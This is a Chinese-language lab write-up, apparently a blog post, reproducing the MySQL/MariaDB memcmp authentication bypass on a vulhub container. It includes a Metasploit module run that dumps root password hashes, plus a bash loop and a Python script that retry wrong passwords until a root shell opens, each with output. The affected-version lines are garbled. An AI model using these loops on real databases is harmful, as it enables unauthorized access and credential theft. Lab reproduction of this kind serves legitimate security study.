漏洞介绍
当连接MariaDB/MySQL时,输入的密码会与期望的正确密码比较,由于不正确的处理,会导致即便是memcmp()返回一个非零值,也会使MySQL认为两个密码是相同的。
这个缺陷的根源在于memcmp()函数总是返回-128到127(有符号字符)范围内的值。也就是说,只有在Linux系统使用SSE优化库(GNU C库)的场合下才能被利用,成功触发这一漏洞的概率约为1:256。
受影响版本:
MariaDB versions from 5.1.62, 5.2.12, 5.3.6, 5.5.23 are not.
MySQL versions from 5.1.63, 5.5.24, 5.6.6 are not.
环境搭建
环境使用vulhub搭建好的docker
配置:mysql(版本:5.5.23) 账号密码:root/123456
漏洞验证
metasploit
msf > use auxiliary/scanner/mysql/mysql_authbypass_hashdump
msf auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set USERNAME root
USERNAME => root
msf auxiliary(scanner/mysql/mysql_authbypass_hashdump) > set RHOSTS 192.168.31.23
RHOSTS => 192.168.31.23
msf auxiliary(scanner/mysql/mysql_authbypass_hashdump) > run
[+] 192.168.31.23:3306 - 192.168.31.23:3306 The server allows logins, proceeding with bypass test
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Successfully bypassed authentication after 64 attempts. URI: mysql://root:ZoSnI@192.168.31.23:3306
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Successfully exploited the authentication bypass flaw, dumping hashes...
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Saving HashString as Loot: root:*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
[+] 192.168.31.23:3306 - 192.168.31.23:3306 Hash Table has been saved: /root/.msf4/loot/20190714220813_default_192.168.31.23_mysql.hashes_963184.txt
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
bash
for i inseq 1 1000; do mysql -u root --password=bad -h IP 2>/dev/null; done
root@kali:~# for i in `seq 1 1000`; do mysql -u root --password=bad -h 192.168.31.23 2>/dev/null; done
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 6065
Server version: 5.5.23 Source distribution
Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| mysql |
| performance_schema |
| test |
+--------------------+
4 rows in set (0.00 sec)
MySQL [(none)]>
python
代码
#a.py
#!/usr/bin/python
import subprocess
while 1:
subprocess.Popen("mysql -u root mysql -h IP --password=baah", shell=True).wait()
结果显示
root@kali:~# python a.py
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
......
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
ERROR 1045 (28000): Access denied for user 'root'@'192.168.31.22' (using password: YES)
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MySQL connection id is 8064
Server version: 5.5.23 Source distribution
Copyright (c) 2000, 2017, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MySQL [mysql]>
参考文章:
https://www.freebuf.com/vuls/3815.html
https://www.jianshu.com/p/909bfe51c468
292
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
